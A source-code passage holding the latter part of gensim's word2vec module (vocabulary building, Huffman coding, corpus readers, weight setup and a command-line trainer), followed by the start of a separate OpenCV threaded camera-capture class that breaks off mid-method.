if len(parts) != vector_size + 1:
raise ValueError("invalid vector on line %s (is this really the text format?)" % line_no)
word, weights = parts[0], [REAL(x) for x in parts[1:]]
if word in self.wv.vocab:
overlap_count += 1
self.wv.vectors[self.wv.vocab[word].index] = weights
self.trainables.vectors_lockf[self.wv.vocab[word].index] = lockf # lock-factor: 0.0=no changes
logger.info("merged %d vectors into %s matrix from %s", overlap_count, self.wv.vectors.shape, fname)
@deprecated("Method will be removed in 4.0.0, use self.wv.__getitem__() instead")
def __getitem__(self, words):
"""Deprecated. Use `self.wv.__getitem__` instead.
Refer to the documentation for :meth:`~gensim.models.keyedvectors.Word2VecKeyedVectors.__getitem__`.
"""
return self.wv.__getitem__(words)
@deprecated("Method will be removed in 4.0.0, use self.wv.__contains__() instead")
def __contains__(self, word):
"""Deprecated. Use `self.wv.__contains__` instead.
Refer to the documentation for :meth:`~gensim.models.keyedvectors.Word2VecKeyedVectors.__contains__`.
"""
return self.wv.__contains__(word)
def predict_output_word(self, context_words_list, topn=10):
"""Get the probability distribution of the center word given context words.
Parameters
----------
context_words_list : list of str
List of context words.
topn : int, optional
Return `topn` words and their probabilities.
Returns
-------
list of (str, float)
`topn` length list of tuples of (word, probability).
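        Examples
        --------
        A minimal sketch, assuming a model trained with negative sampling (the corpus and the
        context words below are illustrative placeholders):
        .. sourcecode:: pycon
            >>> from gensim.test.utils import common_texts
            >>> model = Word2Vec(common_texts, size=10, min_count=1, negative=5)
            >>> model.predict_output_word(['system', 'graph'], topn=3)  # doctest: +SKIP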
"""
if not self.negative:
raise RuntimeError(
"We have currently only implemented predict_output_word for the negative sampling scheme, "
"so you need to have run word2vec with negative > 0 for this to work."
)
if not hasattr(self.wv, 'vectors') or not hasattr(self.trainables, 'syn1neg'):
raise RuntimeError("Parameters required for predicting the output words not found.")
word_vocabs = [self.wv.vocab[w] for w in context_words_list if w in self.wv.vocab]
if not word_vocabs:
warnings.warn("All the input context words are out-of-vocabulary for the current model.")
return None
word2_indices = [word.index for word in word_vocabs]
l1 = np_sum(self.wv.vectors[word2_indices], axis=0)
if word2_indices and self.cbow_mean:
l1 /= len(word2_indices)
# propagate hidden -> output and take softmax to get probabilities
prob_values = exp(dot(l1, self.trainables.syn1neg.T))
prob_values /= sum(prob_values)
top_indices = matutils.argsort(prob_values, topn=topn, reverse=True)
# returning the most probable output words with their probabilities
return [(self.wv.index2word[index1], prob_values[index1]) for index1 in top_indices]
def init_sims(self, replace=False):
"""Deprecated. Use `self.wv.init_sims` instead.
See :meth:`~gensim.models.keyedvectors.Word2VecKeyedVectors.init_sims`.
"""
if replace and hasattr(self.trainables, 'syn1'):
del self.trainables.syn1
return self.wv.init_sims(replace)
def reset_from(self, other_model):
"""Borrow shareable pre-built structures from `other_model` and reset hidden layer weights.
Structures copied are:
* Vocabulary
* Index to word mapping
* Cumulative frequency table (used for negative sampling)
* Cached corpus length
Useful when testing multiple models on the same corpus in parallel.
Parameters
----------
other_model : :class:`~gensim.models.word2vec.Word2Vec`
Another model to copy the internal structures from.
"""
self.wv.vocab = other_model.wv.vocab
self.wv.index2word = other_model.wv.index2word
self.vocabulary.cum_table = other_model.vocabulary.cum_table
self.corpus_count = other_model.corpus_count
self.trainables.reset_weights(self.hs, self.negative, self.wv)
@staticmethod
def log_accuracy(section):
"""Deprecated. Use `self.wv.log_accuracy` instead.
See :meth:`~gensim.models.word2vec.Word2VecKeyedVectors.log_accuracy`.
"""
return Word2VecKeyedVectors.log_accuracy(section)
@deprecated("Method will be removed in 4.0.0, use self.wv.evaluate_word_analogies() instead")
def accuracy(self, questions, restrict_vocab=30000, most_similar=None, case_insensitive=True):
"""Deprecated. Use `self.wv.accuracy` instead.
See :meth:`~gensim.models.word2vec.Word2VecKeyedVectors.accuracy`.
"""
most_similar = most_similar or Word2VecKeyedVectors.most_similar
return self.wv.accuracy(questions, restrict_vocab, most_similar, case_insensitive)
def __str__(self):
"""Human readable representation of the model's state.
Returns
-------
str
Human readable representation of the model's state, including the vocabulary size, vector size
and learning rate.
"""
return "%s(vocab=%s, size=%s, alpha=%s)" % (
self.__class__.__name__, len(self.wv.index2word), self.wv.vector_size, self.alpha
)
def delete_temporary_training_data(self, replace_word_vectors_with_normalized=False):
"""Discard parameters that are used in training and scoring, to save memory.
Warnings
--------
Use only if you're sure you're done training a model.
Parameters
----------
replace_word_vectors_with_normalized : bool, optional
If True, forget the original (not normalized) word vectors and only keep
the L2-normalized word vectors, to save even more memory.
"""
if replace_word_vectors_with_normalized:
self.init_sims(replace=True)
self._minimize_model()
def save(self, *args, **kwargs):
"""Save the model.
This saved model can be loaded again using :func:`~gensim.models.word2vec.Word2Vec.load`, which supports
online training and getting vectors for vocabulary words.
Parameters
----------
fname : str
Path to the file.
"""
# don't bother storing the cached normalized vectors, recalculable table
kwargs['ignore'] = kwargs.get('ignore', ['vectors_norm', 'cum_table'])
super(Word2Vec, self).save(*args, **kwargs)
def get_latest_training_loss(self):
"""Get current value of the training loss.
Returns
-------
float
Current training loss.
"""
return self.running_training_loss
@deprecated(
"Method will be removed in 4.0.0, keep just_word_vectors = model.wv to retain just the KeyedVectors instance"
)
def _minimize_model(self, save_syn1=False, save_syn1neg=False, save_vectors_lockf=False):
if save_syn1 and save_syn1neg and save_vectors_lockf:
return
if hasattr(self.trainables, 'syn1') and not save_syn1:
del self.trainables.syn1
if hasattr(self.trainables, 'syn1neg') and not save_syn1neg:
del self.trainables.syn1neg
if hasattr(self.trainables, 'vectors_lockf') and not save_vectors_lockf:
del self.trainables.vectors_lockf
self.model_trimmed_post_training = True
@classmethod
def load_word2vec_format(
cls, fname, fvocab=None, binary=False, encoding='utf8', unicode_errors='strict',
limit=None, datatype=REAL):
"""Deprecated. Use :meth:`gensim.models.KeyedVectors.load_word2vec_format` instead."""
raise DeprecationWarning("Deprecated. Use gensim.models.KeyedVectors.load_word2vec_format instead.")
def save_word2vec_format(self, fname, fvocab=None, binary=False):
"""Deprecated. Use `model.wv.save_word2vec_format` instead.
See :meth:`gensim.models.KeyedVectors.save_word2vec_format`.
"""
raise DeprecationWarning("Deprecated. Use model.wv.save_word2vec_format instead.")
@classmethod
def load(cls, *args, **kwargs):
"""Load a previously saved :class:`~gensim.models.word2vec.Word2Vec` model.
See Also
--------
:meth:`~gensim.models.word2vec.Word2Vec.save`
Save model.
Parameters
----------
fname : str
Path to the saved file.
Returns
-------
:class:`~gensim.models.word2vec.Word2Vec`
Loaded model.
"""
try:
model = super(Word2Vec, cls).load(*args, **kwargs)
# for backward compatibility for `max_final_vocab` feature
if not hasattr(model, 'max_final_vocab'):
model.max_final_vocab = None
model.vocabulary.max_final_vocab = None
return model
except AttributeError:
logger.info('Model saved using code from earlier Gensim Version. Re-loading old model in a compatible way.')
from gensim.models.deprecated.word2vec import load_old_word2vec
return load_old_word2vec(*args, **kwargs)
class BrownCorpus(object):
"""Iterate over sentences from the `Brown corpus <https://en.wikipedia.org/wiki/Brown_Corpus>`_
(part of `NLTK data <https://www.nltk.org/data.html>`_).
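    Examples
    --------
    Illustrative only (the path is a placeholder for a local copy of the corpus):
    .. sourcecode:: pycon
        >>> sentences = BrownCorpus('/path/to/nltk_data/corpora/brown')
        >>> model = Word2Vec(sentences)  # doctest: +SKIP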
"""
def __init__(self, dirname):
self.dirname = dirname
def __iter__(self):
for fname in os.listdir(self.dirname):
fname = os.path.join(self.dirname, fname)
if not os.path.isfile(fname):
continue
for line in utils.smart_open(fname):
line = utils.to_unicode(line)
# each file line is a single sentence in the Brown corpus
# each token is WORD/POS_TAG
token_tags = [t.split('/') for t in line.split() if len(t.split('/')) == 2]
# ignore words with non-alphabetic tags like ",", "!" etc (punctuation, weird stuff)
words = ["%s/%s" % (token.lower(), tag[:2]) for token, tag in token_tags if tag[:2].isalpha()]
if not words: # don't bother sending out empty sentences
continue
yield words
class Text8Corpus(object):
"""Iterate over sentences from the "text8" corpus, unzipped from http://mattmahoney.net/dc/text8.zip."""
def __init__(self, fname, max_sentence_length=MAX_WORDS_IN_BATCH):
self.fname = fname
self.max_sentence_length = max_sentence_length
def __iter__(self):
# the entire corpus is one gigantic line -- there are no sentence marks at all
        # so just split the sequence of tokens arbitrarily: 1 sentence = max_sentence_length tokens
sentence, rest = [], b''
with utils.smart_open(self.fname) as fin:
while True:
text = rest + fin.read(8192) # avoid loading the entire file (=1 line) into RAM
if text == rest: # EOF
words = utils.to_unicode(text).split()
sentence.extend(words) # return the last chunk of words, too (may be shorter/longer)
if sentence:
yield sentence
break
last_token = text.rfind(b' ') # last token may have been split in two... keep for next iteration
words, rest = (utils.to_unicode(text[:last_token]).split(),
text[last_token:].strip()) if last_token >= 0 else ([], text)
sentence.extend(words)
while len(sentence) >= self.max_sentence_length:
yield sentence[:self.max_sentence_length]
sentence = sentence[self.max_sentence_length:]
class LineSentence(object):
"""Iterate over a file that contains sentences: one line = one sentence.
Words must be already preprocessed and separated by whitespace.
"""
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""
Parameters
----------
source : string or a file-like object
Path to the file on disk, or an already-open file object (must support `seek(0)`).
limit : int or None
Clip the file to the first `limit` lines. Do no clipping if `limit is None` (the default).
Examples
--------
.. sourcecode:: pycon
>>> from gensim.test.utils import datapath
>>> sentences = LineSentence(datapath('lee_background.cor'))
>>> for sentence in sentences:
... pass
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
def __iter__(self):
"""Iterate through the lines in the source."""
try:
# Assume it is a file-like object and try treating it as such
# Things that don't have seek will trigger an exception
self.source.seek(0)
for line in itertools.islice(self.source, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
except AttributeError:
# If it didn't work like a file, use it as a string filename
with utils.smart_open(self.source) as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i: i + self.max_sentence_length]
i += self.max_sentence_length
class PathLineSentences(object):
"""Like :class:`~gensim.models.word2vec.LineSentence`, but process all files in a directory
in alphabetical order by filename.
The directory must only contain files that can be read by :class:`gensim.models.word2vec.LineSentence`:
.bz2, .gz, and text files. Any file not ending with .bz2 or .gz is assumed to be a text file.
The format of files (either text, or compressed text files) in the path is one sentence = one line,
with words already preprocessed and separated by whitespace.
Warnings
--------
Does **not recurse** into subdirectories.
"""
def __init__(self, source, max_sentence_length=MAX_WORDS_IN_BATCH, limit=None):
"""
Parameters
----------
source : str
Path to the directory.
limit : int or None
Read only the first `limit` lines from each file. Read all if limit is None (the default).
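        Examples
        --------
        Illustrative only (the directory path is a placeholder):
        .. sourcecode:: pycon
            >>> sentences = PathLineSentences('/path/to/corpus_directory')
            >>> for sentence in sentences:  # doctest: +SKIP
            ...     pass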
"""
self.source = source
self.max_sentence_length = max_sentence_length
self.limit = limit
if os.path.isfile(self.source):
logger.debug('single file given as source, rather than a directory of files')
logger.debug('consider using models.word2vec.LineSentence for a single file')
self.input_files = [self.source] # force code compatibility with list of files
elif os.path.isdir(self.source):
self.source = os.path.join(self.source, '') # ensures os-specific slash at end of path
logger.info('reading directory %s', self.source)
self.input_files = os.listdir(self.source)
self.input_files = [self.source + filename for filename in self.input_files] # make full paths
self.input_files.sort() # makes sure it happens in filename order
else: # not a file or a directory, then we can't do anything with it
            raise ValueError('input is neither a file nor a directory')
logger.info('files read into PathLineSentences:%s', '\n'.join(self.input_files))
def __iter__(self):
"""iterate through the files"""
for file_name in self.input_files:
logger.info('reading file %s', file_name)
with utils.smart_open(file_name) as fin:
for line in itertools.islice(fin, self.limit):
line = utils.to_unicode(line).split()
i = 0
while i < len(line):
yield line[i:i + self.max_sentence_length]
i += self.max_sentence_length
def _scan_vocab_worker(stream, progress_queue, max_vocab_size=None, trim_rule=None):
"""Do an initial scan of all words appearing in stream.
    Note: This function cannot be a method of Word2VecVocab because
    of multiprocessing synchronization specifics in Python.
"""
min_reduce = 1
vocab = defaultdict(int)
checked_string_types = 0
sentence_no = -1
total_words = 0
for sentence_no, sentence in enumerate(stream):
if not checked_string_types:
if isinstance(sentence, string_types):
log_msg = "Each 'sentences' item should be a list of words (usually unicode strings). " \
"First item here is instead plain %s." % type(sentence)
progress_queue.put(log_msg)
checked_string_types += 1
for word in sentence:
vocab[word] += 1
if max_vocab_size and len(vocab) > max_vocab_size:
utils.prune_vocab(vocab, min_reduce, trim_rule=trim_rule)
min_reduce += 1
total_words += len(sentence)
progress_queue.put((total_words, sentence_no + 1))
progress_queue.put(None)
return vocab
class Word2VecVocab(utils.SaveLoad):
"""Vocabulary used by :class:`~gensim.models.word2vec.Word2Vec`."""
def __init__(
self, max_vocab_size=None, min_count=5, sample=1e-3, sorted_vocab=True, null_word=0,
max_final_vocab=None, ns_exponent=0.75):
self.max_vocab_size = max_vocab_size
self.min_count = min_count
self.sample = sample
self.sorted_vocab = sorted_vocab
self.null_word = null_word
self.cum_table = None # for negative sampling
self.raw_vocab = None
self.max_final_vocab = max_final_vocab
self.ns_exponent = ns_exponent
def _scan_vocab(self, sentences, progress_per, trim_rule):
sentence_no = -1
total_words = 0
min_reduce = 1
vocab = defaultdict(int)
checked_string_types = 0
for sentence_no, sentence in enumerate(sentences):
if not checked_string_types:
if isinstance(sentence, string_types):
logger.warning(
"Each 'sentences' item should be a list of words (usually unicode strings). "
"First item here is instead plain %s.",
type(sentence)
)
checked_string_types += 1
if sentence_no % progress_per == 0:
logger.info(
"PROGRESS: at sentence #%i, processed %i words, keeping %i word types",
sentence_no, total_words, len(vocab)
)
for word in sentence:
vocab[word] += 1
total_words += len(sentence)
if self.max_vocab_size and len(vocab) > self.max_vocab_size:
utils.prune_vocab(vocab, min_reduce, trim_rule=trim_rule)
min_reduce += 1
corpus_count = sentence_no + 1
self.raw_vocab = vocab
return total_words, corpus_count
def scan_vocab(self, sentences=None, corpus_file=None, progress_per=10000, workers=None, trim_rule=None):
logger.info("collecting all words and their counts")
if corpus_file:
sentences = LineSentence(corpus_file)
total_words, corpus_count = self._scan_vocab(sentences, progress_per, trim_rule)
logger.info(
"collected %i word types from a corpus of %i raw words and %i sentences",
len(self.raw_vocab), total_words, corpus_count
)
return total_words, corpus_count
def sort_vocab(self, wv):
"""Sort the vocabulary so the most frequent words have the lowest indexes."""
if len(wv.vectors):
raise RuntimeError("cannot sort vocabulary after model weights already initialized.")
wv.index2word.sort(key=lambda word: wv.vocab[word].count, reverse=True)
for i, word in enumerate(wv.index2word):
wv.vocab[word].index = i
def prepare_vocab(
self, hs, negative, wv, update=False, keep_raw_vocab=False, trim_rule=None,
min_count=None, sample=None, dry_run=False):
"""Apply vocabulary settings for `min_count` (discarding less-frequent words)
and `sample` (controlling the downsampling of more-frequent words).
Calling with `dry_run=True` will only simulate the provided settings and
report the size of the retained vocabulary, effective corpus length, and
estimated memory requirements. Results are both printed via logging and
returned as a dict.
Delete the raw vocabulary after the scaling is done to free up RAM,
unless `keep_raw_vocab` is set.
"""
min_count = min_count or self.min_count
sample = sample or self.sample
drop_total = drop_unique = 0
# set effective_min_count to min_count in case max_final_vocab isn't set
self.effective_min_count = min_count
# if max_final_vocab is specified instead of min_count
# pick a min_count which satisfies max_final_vocab as well as possible
if self.max_final_vocab is not None:
sorted_vocab = sorted(self.raw_vocab.keys(), key=lambda word: self.raw_vocab[word], reverse=True)
calc_min_count = 1
if self.max_final_vocab < len(sorted_vocab):
calc_min_count = self.raw_vocab[sorted_vocab[self.max_final_vocab]] + 1
self.effective_min_count = max(calc_min_count, min_count)
logger.info(
"max_final_vocab=%d and min_count=%d resulted in calc_min_count=%d, effective_min_count=%d",
self.max_final_vocab, min_count, calc_min_count, self.effective_min_count
)
if not update:
logger.info("Loading a fresh vocabulary")
retain_total, retain_words = 0, []
# Discard words less-frequent than min_count
if not dry_run:
wv.index2word = []
# make stored settings match these applied settings
self.min_count = min_count
self.sample = sample
wv.vocab = {}
for word, v in iteritems(self.raw_vocab):
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
retain_words.append(word)
retain_total += v
if not dry_run:
wv.vocab[word] = Vocab(count=v, index=len(wv.index2word))
wv.index2word.append(word)
else:
drop_unique += 1
drop_total += v
original_unique_total = len(retain_words) + drop_unique
retain_unique_pct = len(retain_words) * 100 / max(original_unique_total, 1)
logger.info(
"effective_min_count=%d retains %i unique words (%i%% of original %i, drops %i)",
self.effective_min_count, len(retain_words), retain_unique_pct, original_unique_total, drop_unique
)
original_total = retain_total + drop_total
retain_pct = retain_total * 100 / max(original_total, 1)
logger.info(
"effective_min_count=%d leaves %i word corpus (%i%% of original %i, drops %i)",
self.effective_min_count, retain_total, retain_pct, original_total, drop_total
)
else:
logger.info("Updating model with new vocabulary")
new_total = pre_exist_total = 0
            new_words, pre_exist_words = [], []
for word, v in iteritems(self.raw_vocab):
if keep_vocab_item(word, v, self.effective_min_count, trim_rule=trim_rule):
if word in wv.vocab:
pre_exist_words.append(word)
pre_exist_total += v
if not dry_run:
wv.vocab[word].count += v
else:
new_words.append(word)
new_total += v
if not dry_run:
wv.vocab[word] = Vocab(count=v, index=len(wv.index2word))
wv.index2word.append(word)
else:
drop_unique += 1
drop_total += v
original_unique_total = len(pre_exist_words) + len(new_words) + drop_unique
pre_exist_unique_pct = len(pre_exist_words) * 100 / max(original_unique_total, 1)
new_unique_pct = len(new_words) * 100 / max(original_unique_total, 1)
logger.info(
"New added %i unique words (%i%% of original %i) "
"and increased the count of %i pre-existing words (%i%% of original %i)",
len(new_words), new_unique_pct, original_unique_total, len(pre_exist_words),
pre_exist_unique_pct, original_unique_total
)
retain_words = new_words + pre_exist_words
retain_total = new_total + pre_exist_total
# Precalculate each vocabulary item's threshold for sampling
if not sample:
# no words downsampled
threshold_count = retain_total
elif sample < 1.0:
# traditional meaning: set parameter as proportion of total
threshold_count = sample * retain_total
else:
# new shorthand: sample >= 1 means downsample all words with higher count than sample
threshold_count = int(sample * (3 + sqrt(5)) / 2)
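        # Worked example (illustrative numbers): with sample=1e-3 and retain_total=1,000,000 the
        # threshold_count is 1000, so a word with raw count v=100,000 gets
        # word_probability = (sqrt(100) + 1) * (1000 / 100000) = 0.11 below, i.e. only ~11% of its
        # occurrences are kept during training.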
downsample_total, downsample_unique = 0, 0
for w in retain_words:
v = self.raw_vocab[w]
word_probability = (sqrt(v / threshold_count) + 1) * (threshold_count / v)
if word_probability < 1.0:
downsample_unique += 1
downsample_total += word_probability * v
else:
word_probability = 1.0
downsample_total += v
if not dry_run:
wv.vocab[w].sample_int = int(round(word_probability * 2**32))
if not dry_run and not keep_raw_vocab:
logger.info("deleting the raw counts dictionary of %i items", len(self.raw_vocab))
self.raw_vocab = defaultdict(int)
logger.info("sample=%g downsamples %i most-common words", sample, downsample_unique)
logger.info(
"downsampling leaves estimated %i word corpus (%.1f%% of prior %i)",
downsample_total, downsample_total * 100.0 / max(retain_total, 1), retain_total
)
# return from each step: words-affected, resulting-corpus-size, extra memory estimates
report_values = {
'drop_unique': drop_unique, 'retain_total': retain_total, 'downsample_unique': downsample_unique,
'downsample_total': int(downsample_total), 'num_retained_words': len(retain_words)
}
if self.null_word:
# create null pseudo-word for padding when using concatenative L1 (run-of-words)
# this word is only ever input – never predicted – so count, huffman-point, etc doesn't matter
self.add_null_word(wv)
if self.sorted_vocab and not update:
self.sort_vocab(wv)
if hs:
# add info about each word's Huffman encoding
self.create_binary_tree(wv)
if negative:
# build the table for drawing random words (for negative sampling)
self.make_cum_table(wv)
return report_values
def add_null_word(self, wv):
word, v = '\0', Vocab(count=1, sample_int=0)
v.index = len(wv.vocab)
wv.index2word.append(word)
wv.vocab[word] = v
def create_binary_tree(self, wv):
"""Create a `binary Huffman tree <https://en.wikipedia.org/wiki/Huffman_coding>`_ using stored vocabulary
word counts. Frequent words will have shorter binary codes.
Called internally from :meth:`~gensim.models.word2vec.Word2VecVocab.build_vocab`.
"""
_assign_binary_codes(wv.vocab)
def make_cum_table(self, wv, domain=2**31 - 1):
"""Create a cumulative-distribution table using stored vocabulary word counts for
drawing random words in the negative-sampling training routines.
To draw a word index, choose a random integer up to the maximum value in the table (cum_table[-1]),
then finding that integer's sorted insertion point (as if by `bisect_left` or `ndarray.searchsorted()`).
That insertion point is the drawn index, coming up in proportion equal to the increment at that slot.
Called internally from :meth:`~gensim.models.word2vec.Word2VecVocab.build_vocab`.
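        Examples
        --------
        Sketch of how one negative sample is drawn from the finished table (the `model` name is
        an illustrative placeholder, not part of the original docs):
        .. sourcecode:: pycon
            >>> from numpy import random
            >>> cum_table = model.vocabulary.cum_table  # doctest: +SKIP
            >>> drawn_index = cum_table.searchsorted(random.randint(cum_table[-1]))  # doctest: +SKIP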
"""
vocab_size = len(wv.index2word)
self.cum_table = zeros(vocab_size, dtype=uint32)
# compute sum of all power (Z in paper)
train_words_pow = 0.0
for word_index in range(vocab_size):
train_words_pow += wv.vocab[wv.index2word[word_index]].count**self.ns_exponent
cumulative = 0.0
for word_index in range(vocab_size):
cumulative += wv.vocab[wv.index2word[word_index]].count**self.ns_exponent
self.cum_table[word_index] = round(cumulative / train_words_pow * domain)
if len(self.cum_table) > 0:
assert self.cum_table[-1] == domain
def _build_heap(vocab):
heap = list(itervalues(vocab))
heapq.heapify(heap)
for i in range(len(vocab) - 1):
min1, min2 = heapq.heappop(heap), heapq.heappop(heap)
heapq.heappush(
heap, Vocab(count=min1.count + min2.count, index=i + len(vocab), left=min1, right=min2)
)
return heap
def _assign_binary_codes(vocab):
"""
Appends a binary code to each vocab term.
Parameters
----------
vocab : dict
A dictionary of :class:`gensim.models.word2vec.Vocab` objects.
Notes
-----
Expects each term to have an .index attribute that contains the order in
which the term was added to the vocabulary. E.g. term.index == 0 means the
term was added to the vocab first.
Sets the .code and .point attributes of each node.
Each code is a numpy.array containing 0s and 1s.
Each point is an integer.
"""
logger.info("constructing a huffman tree from %i words", len(vocab))
heap = _build_heap(vocab)
if not heap:
#
# TODO: how can we end up with an empty heap?
#
logger.info("built huffman tree with maximum node depth 0")
return
# recurse over the tree, assigning a binary code to each vocabulary word
max_depth = 0
stack = [(heap[0], [], [])]
while stack:
node, codes, points = stack.pop()
if node.index < len(vocab):
# leaf node => store its path from the root
node.code, node.point = codes, points
max_depth = max(len(codes), max_depth)
else:
# inner node => continue recursion
points = array(list(points) + [node.index - len(vocab)], dtype=uint32)
stack.append((node.left, array(list(codes) + [0], dtype=uint8), points))
stack.append((node.right, array(list(codes) + [1], dtype=uint8), points))
logger.info("built huffman tree with maximum node depth %i", max_depth)
class Word2VecTrainables(utils.SaveLoad):
"""Represents the inner shallow neural network used to train :class:`~gensim.models.word2vec.Word2Vec`."""
def __init__(self, vector_size=100, seed=1, hashfxn=hash):
self.hashfxn = hashfxn
self.layer1_size = vector_size
self.seed = seed
def prepare_weights(self, hs, negative, wv, update=False, vocabulary=None):
"""Build tables and model weights based on final vocabulary settings."""
# set initial input/projection and hidden weights
if not update:
self.reset_weights(hs, negative, wv)
else:
self.update_weights(hs, negative, wv)
def seeded_vector(self, seed_string, vector_size):
"""Get a random vector (but deterministic by seed_string)."""
# Note: built-in hash() may vary by Python version or even (in Py3.x) per launch
once = random.RandomState(self.hashfxn(seed_string) & 0xffffffff)
return (once.rand(vector_size) - 0.5) / vector_size
def reset_weights(self, hs, negative, wv):
"""Reset all projection weights to an initial (untrained) state, but keep the existing vocabulary."""
logger.info("resetting layer weights")
wv.vectors = empty((len(wv.vocab), wv.vector_size), dtype=REAL)
# randomize weights vector by vector, rather than materializing a huge random matrix in RAM at once
for i in range(len(wv.vocab)):
# construct deterministic seed from word AND seed argument
wv.vectors[i] = self.seeded_vector(wv.index2word[i] + str(self.seed), wv.vector_size)
if hs:
self.syn1 = zeros((len(wv.vocab), self.layer1_size), dtype=REAL)
if negative:
self.syn1neg = zeros((len(wv.vocab), self.layer1_size), dtype=REAL)
wv.vectors_norm = None
self.vectors_lockf = ones(len(wv.vocab), dtype=REAL) # zeros suppress learning
def update_weights(self, hs, negative, wv):
"""Copy all the existing weights, and reset the weights for the newly added vocabulary."""
logger.info("updating layer weights")
gained_vocab = len(wv.vocab) - len(wv.vectors)
newvectors = empty((gained_vocab, wv.vector_size), dtype=REAL)
# randomize the remaining words
for i in range(len(wv.vectors), len(wv.vocab)):
# construct deterministic seed from word AND seed argument
newvectors[i - len(wv.vectors)] = self.seeded_vector(wv.index2word[i] + str(self.seed), wv.vector_size)
# Raise an error if an online update is run before initial training on a corpus
if not len(wv.vectors):
raise RuntimeError(
"You cannot do an online vocabulary-update of a model which has no prior vocabulary. "
"First build the vocabulary of your model with a corpus before doing an online update."
)
wv.vectors = vstack([wv.vectors, newvectors])
if hs:
self.syn1 = vstack([self.syn1, zeros((gained_vocab, self.layer1_size), dtype=REAL)])
if negative:
pad = zeros((gained_vocab, self.layer1_size), dtype=REAL)
self.syn1neg = vstack([self.syn1neg, pad])
wv.vectors_norm = None
# do not suppress learning for already learned words
self.vectors_lockf = ones(len(wv.vocab), dtype=REAL) # zeros suppress learning
# Example: ./word2vec.py -train data.txt -output vec.txt -size 200 -window 5 -sample 1e-4 \
# -negative 5 -hs 0 -binary 0 -cbow 1 -iter 3
if __name__ == "__main__":
import argparse
logging.basicConfig(
format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s',
level=logging.INFO
)
logger.info("running %s", " ".join(sys.argv))
logger.info("using optimization %s", FAST_VERSION)
# check and process cmdline input
program = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print(globals()['__doc__'] % locals())
sys.exit(1)
from gensim.models.word2vec import Word2Vec # noqa:F811 avoid referencing __main__ in pickle
seterr(all='raise') # don't ignore numpy errors
parser = argparse.ArgumentParser()
parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
parser.add_argument(
"-sample",
help="Set threshold for occurrence of words. "
"Those that appear with higher frequency in the training data will be randomly down-sampled;"
" default is 1e-3, useful range is (0, 1e-5)",
type=float, default=1e-3
)
parser.add_argument(
"-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument(
"-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
type=int, default=5
)
parser.add_argument("-threads", help="Use THREADS threads (default 12)", type=int, default=12)
parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
parser.add_argument(
"-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
type=int, default=5
)
parser.add_argument(
"-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
type=int, default=1, choices=[0, 1]
)
parser.add_argument(
"-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
type=int, default=0, choices=[0, 1]
)
parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")
args = parser.parse_args()
if args.cbow == 0:
skipgram = 1
else:
skipgram = 0
corpus = LineSentence(args.train)
model = Word2Vec(
corpus, size=args.size, min_count=args.min_count, workers=args.threads,
window=args.window, sample=args.sample, sg=skipgram, hs=args.hs,
negative=args.negative, cbow_mean=1, iter=args.iter
)
if args.output:
outfile = args.output
model.wv.save_word2vec_format(outfile, binary=args.binary)
else:
outfile = args.train
model.save(outfile + '.model')
if args.binary == 1:
model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
else:
model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)
if args.accuracy:
model.accuracy(args.accuracy)
logger.info("finished running %s", program)
|
camera.py
|
#!/usr/bin/env python3
#!/usr/bin/python3.8
# OpenCV 4.2, Raspberry Pi 3/3B/4B - tested on macOS
import cv2
from threading import Thread, Lock
import time
#internal
from app.camera.frame import Frame
from app.utils.settings import get_config
from app.dto.record import FrameDTO, ConfigDTO
from app.camera.process_frame import ProcessFrame
class CameraAsync:
def __init__(self, source=0, name='thread-stream-0'):
super().__init__()
self.name = name
self.source = source
self.__config = ConfigDTO(get_config())
self.__frame = Frame(self.__config)
self.started = False
self.read_lock = Lock()
self.stream = None
self.grabbed1, self.frame1 = None, None
self.grabbed2, self.frame2 = None, None
self.image = None
self.thread = None
def __build(self) -> None:
if self.stream and self.stream.isOpened():
return
self.__process_frame = ProcessFrame(self.__config)
self.__process_frame.initialize()
self.stream = cv2.VideoCapture(self.source)
if self.__config.camera.dimHeight == 0 or self.__config.camera.dimWidth == 0:
            self.__config.camera.dimWidth = int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH))
            self.__config.camera.dimHeight = int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.__config.camera.applyResize = False
else:
self.__config.camera.applyResize = True
#self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, int(self.__config.camera.dimWidth))
#self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, int(self.__config.camera.dimHeight))
def initialize(self) -> None:
self.__build()
def get_started(self) -> bool:
return self.started
def start(self) -> None:
        if self.started:
return
self.started = True
self.thread = Thread(target=self.__update, args=(), name=self.name, daemon=True)
self.thread.start()
def __update(self) -> None:
        while self.started and self.stream.isOpened():
            (grabbed, frame) = self.stream.read()
            while not grabbed:
                (grabbed, frame) = self.stream.read()
self.__process(grabbed, frame)
def __set_frame(self, grabbed, frame) -> None:
if self.frame1 is None or self.frame2 is None:
self.grabbed1, self.frame1 = grabbed, frame
else:
self.grabbed1, self.frame1 = self.grabbed2, self.frame2
self.grabbed2, self.frame2 = grabbed, frame
def __process(self, grabbed, frame):
self.__set_frame(grabbed, frame)
        if self.__config.camera.applyResize:
self.frame2 = self.__frame.resize(self.frame2)
with self.read_lock:
